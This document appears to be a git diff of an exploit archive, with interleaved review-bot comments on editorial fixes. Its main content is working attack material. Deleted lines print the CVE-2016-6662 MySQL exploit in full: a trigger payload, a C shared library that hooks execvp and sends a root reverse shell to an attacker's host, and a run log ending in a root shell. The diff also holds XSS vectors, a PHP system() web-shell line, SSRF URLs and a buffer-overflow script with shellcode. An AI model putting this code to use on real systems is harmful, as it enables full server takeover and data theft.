- -This could be achieved by writing a malicious trigger payload - a trigger -definition that is an _equivalent_ to the following statement: - -CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf -AFTER INSERT - ON `active_table` FOR EACH ROW -BEGIN - DECLARE void varchar(550); - set global general_log_file='/var/lib/mysql/my.cnf'; - set global general_log = on; - select " -[mysqld] -malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' - -" INTO void; - set global general_log = off; -END; - -into a trigger definition/configuration file (.TRG) of an actively used table -('active_table') with the use of a statement similar to: - -SELECT '...trigger_definition...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' - -Note that _only_ the above SELECT statement is required to write out the trigger -definition by abusing the power of FILE privilege. -The CREATE TRIGGER statement is _never_ executed and is not necessary. This -means that SUPER privilege is not necessary either. See the exploit code for -details. - -Such trigger will be loaded when tables get flushed. From this point on -whenever an INSERT statement is invoked on the table, e.g: - -INSERT INTO `active_table` VALUES('xyz'); - -The trigger's code will be executed with mysql root/admin privileges (notice -'DEFINER' above) and will thus let attacker to modify the general_log settings -despite the lack of administrative/SUPER privileges through their user account -(with SELECT/FILE privileges only). - - ------------------- -VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit - - -----------[ 0ldSQL_MySQL_RCE_exploit.py ]-------------- - #!/usr/bin/python +# +# MySQL / MariaDB / Percona - Remote Root Code Execution / PrivEsc PoC Exploit +# (CVE-2016-6662) +# 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) +# +# For testing purposes only. Do no harm. +# +# Discovered/Coded by: +# +# Dawid Golunski +# http://legalhackers.com +# +# # This is a limited version of the PoC exploit. 
It only allows appending to
 # existing mysql config files with weak permissions. See V) 1) section of
 # the advisory for details on this vector.
@@ -562,9 +25,16 @@ VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit
 # for certain low-privileged attackers that do not have FILE privilege.
 #
 # See full advisory for details:
-# http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt
+# https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
 #
+# Video PoC:
+# https://legalhackers.com/videos/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
+#
+#
+# Follow: https://twitter.com/dawid_golunski
+# &
 # Stay tuned ;)
+#
 intro = """
 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
@@ -669,8 +139,8 @@ with open(hookandrootlib_path, 'rb') as f:
 content = f.read()
 hookandrootlib_hex = binascii.hexlify(content)
-# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG
-# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges)
+# Trigger payload that will elevate user privileges and sucessfully execute SET GLOBAL GENERAL_LOG
+# in spite of the lack of SUPER/admin privileges (attacker only needs SELECT/FILE privileges).
 # Decoded payload (paths may differ) will look similar to:
 """
 DELIMITER //
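Review bot: The new header comment placed above the retained script in the first hunk no longer states which versions are vulnerable; the removed advisory text carried both the affected range (MySQL <= 5.7.14 / 5.6.32 / 5.5.51, with MariaDB and PerconaDB also listed) and the fixed releases (5.7.15 / 5.6.33 / 5.5.52), and after this hunk and the large deletion hunk later in the file that information only survives behind the external advisory URL. A reader checking whether a deployment is in scope should not depend on an off-site link, so keep one line in the header, e.g. `# Affected: MySQL <= 5.7.14 / 5.6.32 / 5.5.51 (MariaDB, PerconaDB too); fixed in 5.7.15 / 5.6.33 / 5.5.52`. The script body continues outside the hunk.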
@@ -776,437 +246,3 @@ info("""Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can # Shutdown shutdown(0) - - ---------------------------------------------------- - - - - - -----------[ mysql_hookandroot_lib.c ]-------------- - -/* - -(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit -mysql_hookandroot_lib.c - -This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit. -The library is meant to be loaded by mysqld_safe on mysqld daemon startup -to create a reverse shell that connects back to the attacker's host on -6603 port (mysql port in reverse ;) and provides a root shell on the -target. - -mysqld_safe will load this library through the following setting: - -[mysqld] -malloc_lib=mysql_hookandroot_lib.so - -in one of the my.cnf config files (e.g. /etc/my.cnf). - -This shared library will hook the execvp() function which is called -during the startup of mysqld process. -It will then fork a reverse shell and clean up the poisoned my.cnf -file in order to let mysqld run as normal so that: -'service mysql restart' will work without a problem. - -Before compiling adjust IP / PORT and config path. - - -~~ -Discovered/Coded by: - -Dawid Golunski -http://legalhackers.com - - -~~ -Compilation (remember to choose settings compatible with the remote OS/arch): - -gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl - -Disclaimer: - -For testing purposes only. Do no harm. 
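Review bot: The rewritten comment in the third hunk introduces a spelling regression: the old side reads `successfully execute SET GLOBAL GENERAL_LOG` and the new side reads `sucessfully execute SET GLOBAL GENERAL_LOG`. The only other change to those two lines is the trailing period, so the first line should be `# Trigger payload that will elevate user privileges and successfully execute SET GLOBAL GENERAL_LOG`. The `with open(...)` block and the payload string this comment introduces both extend beyond the hunk.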
- -Full advisory URL: -http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt - -*/ - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define ATTACKERS_IP "127.0.0.1" -#define SHELL_PORT 6033 -#define INJECTED_CONF "/var/lib/mysql/my.cnf" - -char* env_list[] = { "HOME=/root", NULL }; -typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); -static execvp_func_t old_execvp = NULL; - - -// fork & send a bash shell to the attacker before starting mysqld -void reverse_shell(void) { - - int i; int sockfd; - //socklen_t socklen; - struct sockaddr_in srv_addr; - srv_addr.sin_family = AF_INET; - srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port - srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip - - // create new TCP socket && connect - sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); - connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); - - for(i = 0; i <= 2; i++) dup2(sockfd, i); - execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); - - exit(0); -} - - -/* - cleanup injected data from the target config before it is read by mysqld - in order to ensure clean startup of the service - - The injection (if done via logging) will start with a line like this: - - /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). 
started with: - -*/ - -int config_cleanup() { - - FILE *conf; - char buffer[2000]; - long cut_offset=0; - - conf = fopen(INJECTED_CONF, "r+"); - if (!conf) return 1; - - while (!feof(conf)) { - fgets(buffer, sizeof(buffer), conf); - if (strstr(buffer,"/usr/sbin/mysqld, Version")) { - cut_offset = (ftell(conf) - strlen(buffer)); - } - - } - if (cut_offset>0) ftruncate(fileno(conf), cut_offset); - fclose(conf); - return 0; - -} - - -// execvp() hook -int execvp(const char* filename, char* const argv[]) { - - pid_t pid; - int fd; - - // Simple root PoC (touch /root/root_via_mysql) - fd = open("/root/root_via_mysql", O_CREAT); - close(fd); - - old_execvp = dlsym(RTLD_NEXT, "execvp"); - - // Fork a reverse shell and execute the original execvp() function - pid = fork(); - if (pid == 0) - reverse_shell(); - - // clean injected payload before mysqld is started - config_cleanup(); - return old_execvp(filename, argv); -} - - ------------------------------------------------- - - - - -Replication / testing: -~~~~~~~~~~~~~~~~~~ - -As admin on the target system: -~~~~~~~~ - -1. Set up a test database account/permissions: - -CREATE DATABASE pocdb; -GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!'; -GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'; - - -2. Simulate write access on any of available mysql configs. -It just needs to be a valid/parsable config with section e.g: - -[isamchk] -key_buffer = 16M - -For example, /etc/mysql/my.cnf on Debian: - -# chown mysql:mysql /etc/mysql/my.cnf - -# ls -l /etc/mysql/my.cnf --rw-r--r-- 1 mysql mysql 3534 Sep 11 02:15 /etc/mysql/my.cnf - -3. Run the exploit as the attacker and restart mysql when exploit -is done. - -Note that attackers could be able to force this step remotely by -issuing a remote SHUTDOWN command/SQL statement. - - -As attacker: -~~~~~~~~ - -1. Enter your library path in mysql_hookandroot_lib.c src. - -2. Run the 0ldSQL_MySQL_RCE_exploit.py script. 
- - -Example run: -~~~~~~~~ - -attacker$ ./0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass 'p0cpass!' -dbhost 192.168.1.10 -dbname pocdb -mycnf /etc/mysql/my.cnf - -0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) -(CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit - -For testing purposes only. Do no harm. - -Discovered/Coded by: - -Dawid Golunski -http://legalhackers.com - - -[+] Connecting to target server 192.168.1.10 and target mysql account 'attacker@192.168.1.10' using DB 'pocdb' - -[+] The account in use has the following grants/perms: - -GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD -GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%' - -[+] Compiling mysql_hookandroot_lib.so - -[+] Converting mysql_hookandroot_lib.so into HEX - -[+] Saving trigger payload into /var/lib/mysql/pocdb/poctable.TRG - -[+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target - -[+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded - -[+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /etc/mysql/my.cnf - -[+] Showing the contents of /etc/mysql/my.cnf config to verify that our setting (malloc_lib) got injected - -[mysql] -#no-auto-rehash # faster start of mysql but no tab completition - -[isamchk] -key_buffer = 16M - -!includedir /etc/mysql/conf.d/ -/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: -Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock -Time Id Command Argument -160912 8:48:41 44 Query select " - -# 0ldSQL_MySQL_RCE_exploit got here :) - -[mysqld] -malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' - -[abyss] -" INTO void - 44 Query SET global general_log = off - -[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :) - -[+] Everything is set up and ready. 
Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :) - -listening on [any] 6033 ... - -connect to [192.168.1.20] from dbserver [192.168.1.10] 36932 -bash: cannot set terminal process group (963): Inappropriate ioctl for device -bash: no job control in this shell - -root@debian:/# id -id -uid=0(root) gid=0(root) groups=0(root) - -root@debian:/# ls -l /root/root_via_mysql ----------- 1 root root 0 Sep 10 22:50 /root/root_via_mysql - - -root@debian:/# exit -exit -exit - -[+] Shell closed. Hope you had fun. - -[+] Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;) - -[+] Exiting (code: 0) - - - -VII. BUSINESS IMPACT -------------------------- - -As discussed above the vulnerability could be exploited by attackers with both -privileged and unprivileged (with FILE privilege only) access to mysql accounts. -It could also be combined with CVE-2016-6663 vulnerability which will be released -shortly and could allow certain attackers to escalate their privileges to root -even without FILE privilege. - -The vulnerability could also be exploited via an SQL injection vector, which -removes the need for the attackers to have direct mysql connection and increases -the risk of exploitation. - -Successful exploitation could gain a attacker a remote shell with root privileges -which would allow them to fully compromise the remote system. - -If exploited, the malicious code would run as soon as MySQL daemon gets -restarted. -As mentioned, the restart could be triggered manually, via a system update, -package update (including an update of dependencies), system reboot etc.). -Attackers might also be able to speed up the server restart remotely by issuing -a SHUTDOWN SQL statement or 'shutdown' command via mysqladmin. - - - -VIII. 
SYSTEMS AFFECTED -------------------------- - -All MySQL versions from the oldest versions to the latest shown at the beginnig -of this advisory. - -Some systems run MySQL via Systemd and provide direct startup path to mysqld -daemon instead of using mysqld_safe wrapper script. These systems however are -also at risk as mysqld_safe may be called on update by the installation scripts -or some other system services. It could also be triggered manually by -administrators running mysqld_safe as a habit. - -Because the exploit only accesses files normally used by MySQL server ( -such as the config), and the injected library is preloaded by mysqld_safe startup -scripta not included within the default policies, the vulnerability can be -exploited even if security modules as SELinux and AppArmor are installed with -active security policies for the MySQL daemon. - - -IX. VENDOR RESPONSE / SOLUTION -------------------------- - -The vulnerability was reported to Oracle on 29th of July 2016 and triaged -by the security team. -It was also reported to the other affected vendors including PerconaDB and MariaDB. - -The vulnerabilities were patched by PerconaDB and MariaDB vendors in all branches -by 30th of August. -During the course of the patching process by these vendors the patches went into -public repositories and the fixed security issues were also mentioned in the -new releases which could be noticed by malicious attackers. - -As over 40 days have passed since reporting the issues and patches were already -mentioned publicly (by Percona and MariaDB) , a decision was made to start -disclosing vulnerabilities (with limited PoC) to inform users about the risks -before the vendor's next CPU update (scheduled for 18th of October). - -No official patches or mitigations are available at this time from the vendor. -As temporary mitigations, users should ensure that no mysql config files are -owned by mysql user, and create root-owned dummy my.cnf files that are not in -use. 
-These are by no means a complete solution and users should apply official vendor -patches as soon as they become available. - -Update (16/09/2016): -It has been found that the vendor silently (i.e. without notifing the researcher -via a direct communication despite the ongoing private communication via email, -nor via releasing an immediate public Security Alert to publicly announce the -critical fixes) released security patches for the CVE-2016-6662 vulnerability in -the following releases: - -https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html -https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html -https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html - -which changes the vulnerable/exploitable version list to the following: - -MySQL <= 5.7.14 - 5.6.32 - 5.5.51 - - -X. REFERENCES -------------------------- - -http://legalhackers.com - -http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html - -Source codes from the advisory: -http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py - -http://legalhackers.com/exploits/mysql_hookandroot_lib.c - -MySQL releases containing security fixes: -https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html -https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html -https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html -which can be downloaded from: -http://dev.mysql.com/downloads/mysql/ - -https://mariadb.org/mariadb-server-versions-remote-root-code-execution-vulnerability-cve-2016-6662/ - -https://security-tracker.debian.org/tracker/CVE-2016-6662 - -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662 - -The old vulnerability fixed in MySQL version 3.23.55: -https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0150 - - -XI. CREDITS -------------------------- - -The vulnerability has been discovered by Dawid Golunski -dawid (at) legalhackers (dot) com -http://legalhackers.com - -XII. 
REVISION HISTORY -------------------------- - -12.09.2016 - Advisory released publicly as 0day -16.09.2016 - Updated the IV section with important notes to clarify - misconceptions observed on some security forums. -16.09.2016 - Updated the IX section to add information about fixed releases - along with I and II sections to reflect these. -22.09.2016 - Updated V. 3) section and fixed some typos. -23.09.2016 - Added notes about potential use of SHUTDOWN command/SQL statement - that remote attackers could use in order to speed up the restart. - -XIII. LEGAL NOTICES -------------------------- - -The information contained within this advisory is supplied "as-is" with -no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. -
diff --git a/platforms/multiple/remote/39258.txt b/platforms/multiple/remote/39258.txt
index 8bf338c1c..f6b4deccc 100755
--- a/platforms/multiple/remote/39258.txt
+++ b/platforms/multiple/remote/39258.txt
@@ -1,4 +1,4 @@
-source: http://www.securityfocus.com/bid/68
+source: http://www.securityfocus.com/bid/68/info
 http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
diff --git a/platforms/multiple/remote/39259.txt b/platforms/multiple/remote/39259.txt
index 83ec1b78a..3038825e6 100755
--- a/platforms/multiple/remote/39259.txt
+++ b/platforms/multiple/remote/39259.txt
@@ -1,4 +1,4 @@
-source: http://www.securityfocus.com/bid/68
+source: http://www.securityfocus.com/bid/68/info
 http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
diff --git a/platforms/php/webapps/27671.txt b/platforms/php/webapps/27671.txt
deleted file mode 100755
index 3b9a5d435..000000000
--- a/platforms/php/webapps/27671.txt
+++ /dev/null
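Review bot: The corrected reference in the 39258.txt hunk, `source: http://www.securityfocus.com/bid/68/info`, still looks wrong: the file's remaining context ends with a stray `663/info` fragment, which suggests the original reference was a single BID 68663 that got split across lines, so appending `/info` to `/bid/68` repairs the URL shape but likely cements a wrong ID. Unless BID 68 really is the intended source, the line should read `source: http://www.securityfocus.com/bid/68663/info` with the dangling fragment removed; this cannot be confirmed from the diff alone and is worth checking against the original advisory. The 39259.txt hunk shows the identical pattern and should be treated the same way.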
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/17581/info
-
-LinPHA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
-
-An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-LinPHA 1.1.0 is reported vulnerable. Other versions may be affected as well.
-
-http://www.example.com/plugins/stats/stats_view.php?date_from=[XSS]
-http://www.example.com/plugins/stats/stats_view.php?date_to=[XSS]
-http://www.example.com/plugins/stats/stats_view.php?date=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/28966.txt b/platforms/php/webapps/28966.txt
deleted file mode 100755
index 6e300f36d..000000000
--- a/platforms/php/webapps/28966.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/20998/info
-
-Drake CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Version 0.2 is vulnerable; other versions may also be affected.
-
-NOTE: This BID is being retired because reports indicate that this issue is not exploitable.
-
-http://www.example.com//index.php?option=contact&Itemid=10&task=category&id=alert(764606807)%3B
\ No newline at end of file
diff --git a/platforms/php/webapps/29495.txt b/platforms/php/webapps/29495.txt
deleted file mode 100755
index 8cf5c5152..000000000
--- a/platforms/php/webapps/29495.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/22115/info
-
-The 'sabros.us' application is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-http://www.example.com/index.php?tag=
\ No newline at end of file
diff --git a/platforms/php/webapps/31060.txt b/platforms/php/webapps/31060.txt
deleted file mode 100755
index 49bf805d9..000000000
--- a/platforms/php/webapps/31060.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/27459/info
-
-Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
-
-http://www.example.com/[path]/index.php?option="'>&Itemid=12
\ No newline at end of file
diff --git a/platforms/php/webapps/31657.txt b/platforms/php/webapps/31657.txt
deleted file mode 100755
index dd2bce796..000000000
--- a/platforms/php/webapps/31657.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/28810/info
-
-Blogator-script is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Blogator-script 0.95 is affected; other versions may also be vulnerable.
-
-http://www.example.com/BS0.95/Blogator-script/bs_auth.php?msg=[XSS]
-
-
diff --git a/platforms/php/webapps/32103.txt b/platforms/php/webapps/32103.txt
deleted file mode 100755
index fff0e2fb1..000000000
--- a/platforms/php/webapps/32103.txt
+++ /dev/null
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/30334/info
-
-VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
-
-VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
-
-http://www.example.com/visualpic/?login&pic=>">
-http://www.example.com/visualpic/?pic=%00'">
-http://www.example.com/visualpic/?login&pic=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32905.txt b/platforms/php/webapps/32905.txt
deleted file mode 100755
index bcd4b4ed0..000000000
--- a/platforms/php/webapps/32905.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/34500/info
-
-LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
-
-Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
-
-Versions prior to LinPHA 1.3.4 are vulnerable.
-
-http://www.example.com/linpha-1.3.2/login.php?ref='>
\ No newline at end of file
diff --git a/platforms/php/webapps/32906.txt b/platforms/php/webapps/32906.txt
deleted file mode 100755
index 17fbd5c1c..000000000
--- a/platforms/php/webapps/32906.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/34500/info
-
-LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
-
-Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.
-
-Versions prior to LinPHA 1.3.4 are vulnerable.
-
-http://www.example.com/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34154.txt b/platforms/php/webapps/34154.txt
deleted file mode 100755
index 16773a160..000000000
--- a/platforms/php/webapps/34154.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/40914/info
-
-Software Index is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and to launch other attacks.
-
-http://www.example.com/signinform.php?msg=/">indoushka
\ No newline at end of file
diff --git a/platforms/php/webapps/40771.txt b/platforms/php/webapps/40771.txt
new file mode 100755
index 000000000..7a1d7eb99
--- /dev/null
+++ b/platforms/php/webapps/40771.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Answer My Question 1.3 Plugin for WordPress – Sql Injection
+# Date: 10/11/2016
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/answer-my-question/
+# Software Link: https://wordpress.org/plugins/answer-my-question/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3
+# Tested on: Windows 8.1
+
+1 - Description
+
+$_POST['id'] is not escaped. Url is accessible for any user.
+
+http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/
+
+2 - Proof of Concept
+
+
+
+
+
+3. Solution
+
+
+--
+Atenciosamente
+
+Lenon Leite
diff --git a/platforms/php/webapps/40772.txt b/platforms/php/webapps/40772.txt
new file mode 100755
index 000000000..d1e0cfb73
--- /dev/null
+++ b/platforms/php/webapps/40772.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Sirv 1.3.1 Plugin For WordPress Sql Injection
+# Date: 10/11/2016
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/sirv/
+# Software Link: https://wordpress.org/plugins/sirv/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3.1
+# Tested on: Windows 8.1
+
+
+1 - Description
+
+$_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every
+registered user.
+
+http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
+
+2. Proof of Concept
+
+Login as regular user.
+
+
+
+
+
+
+ 3. Solution:
+
+Update to version 1.3.2
+
+--
+Atenciosamente
+
+Lenon Leite
diff --git a/platforms/php/webapps/5392.php b/platforms/php/webapps/5392.php
index 6d8cf0116..0002fd2be 100755
--- a/platforms/php/webapps/5392.php
+++ b/platforms/php/webapps/5392.php
@@ -65,7 +65,7 @@ 408. for example: 409. User : login failed! <== oops! ;) 410. will be replaced by: - 411. User <?php echo system($_GET['cwd']); ?>: login failed! + 411. User : login failed! */
diff --git a/platforms/windows/dos/40773.html b/platforms/windows/dos/40773.html
new file mode 100755
index 000000000..0b7cf10ec
--- /dev/null
+++ b/platforms/windows/dos/40773.html
@@ -0,0 +1,17 @@
+
+
+
+
+
+
+
diff --git a/platforms/windows/local/5361.py b/platforms/windows/local/5361.py
deleted file mode 100755
index 777627510..000000000
--- a/platforms/windows/local/5361.py
+++ /dev/null
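Review bot: After the redaction in the 5392.php hunk, the new line 411 (`+ 411. User : login failed!`) reads exactly like the context line 409 it is contrasted with, so the comment's "will be replaced by" example no longer shows any difference and a reader cannot tell whether the original advisory text was empty or the archive stripped it. Marking the removal explicitly keeps the explanatory comment honest about what was taken out, e.g. `411. User [injected PHP payload removed by archive]: login failed!`. The enclosing comment block starts outside the hunk, and two of the seven old-side lines are not visible here, so a marker may already exist nearby.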
@@ -1,111 +0,0 @@ -#usage: exploit.py - -print "-----------------------------------------------------------------------" -print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n' -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " Once you create the file, open it with Visual Basic 6 and click on" -print " command name." -print "-----------------------------------------------------------------------" - -buff = "A" * 555 - -get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll - -nop = "\x90" * 12 - -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" - "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" - "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" - "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" - "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" - "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" - "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" - "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" 
